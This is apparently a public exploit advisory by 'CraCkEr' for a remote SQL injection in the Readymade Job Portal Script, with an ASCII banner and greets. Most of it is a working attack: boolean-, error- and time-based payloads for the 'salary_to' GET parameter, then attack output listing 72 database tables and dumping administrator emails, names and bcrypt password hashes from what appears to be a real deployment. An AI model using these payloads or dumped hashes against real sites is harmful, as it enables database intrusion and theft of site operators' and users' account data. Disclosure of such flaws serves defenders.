Headline
Readymade Job Portal Script SQL Injection
Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : i-netsolution.com │ │ ││ Vendor : i-Net Solution │ │ ││ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves ││ Vuln Type: Remote SQL Injection │ │ as a bridge between employers ││ Method : GET │ │ and job seekers ││ Impact : Database Access │ │ ││ │ │ ││────────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'salary_to' is vulnerable.---Parameter: salary_to (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'theminsall_jobportal_db'[INFO] fetching tables for database: 'theminsall_jobportal_db'Database: theminsall_jobportal_db[72 tables]+----------------------------------+| admin_password_resets || admins || applicant_messages || blog_categories || blogs || career_levels || cities || cms || cms_content || companies || company_messages || company_password_resets || contact_messages || countries || countries_details || degree_levels || degree_types || failed_jobs || faqs || favourite_applicants || favourites_company || favourites_job || functional_areas || genders || industries || job_alerts || job_apply || job_apply_rejected || job_experiences || job_shifts || job_skills || job_titles || job_types || jobs || language_levels || languages || major_subjects || manage_job_skills || marital_statuses || migrations || ownership_types || packages || password_resets || payu_transactions || profile_cvs || profile_education_major_subjects || profile_educations || profile_experiences || profile_languages || profile_projects || profile_skills || profile_summaries || queue_jobs || report_abuse_company_messages || report_abuse_messages || result_types || roles || salary_periods || send_to_friend_messages || seo || site_settings || sliders || states || subscriptions || testimonials || unlocked_users || user_messages || users || videos || widget_pages || widgets || widgets_data |+----------------------------------+[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'Database: theminsall_jobportal_dbTable: admins[8 columns]+----------------+------------------+| Column | Type |+----------------+------------------+| created_at | timestamp || email | varchar(191) || id | int(10) unsigned || name | varchar(191) || password | varchar(191) || remember_token | varchar(100) || role_id | int(11) || updated_at | timestamp |+----------------+------------------+[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'Database: theminsall_jobportal_dbTable: admins[3 entries]+----+--------------------+--------------------------------------------------------------+-----------+| id | email | password | name |+----+--------------------+--------------------------------------------------------------+-----------+| 3 | [email protected] | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer || 4 | [email protected] | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin || 5 | [email protected] | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |+----+--------------------+--------------------------------------------------------------+-----------+ Possible Algorithms: bcrypt $2*$, Blowfish (Unix)[-] Done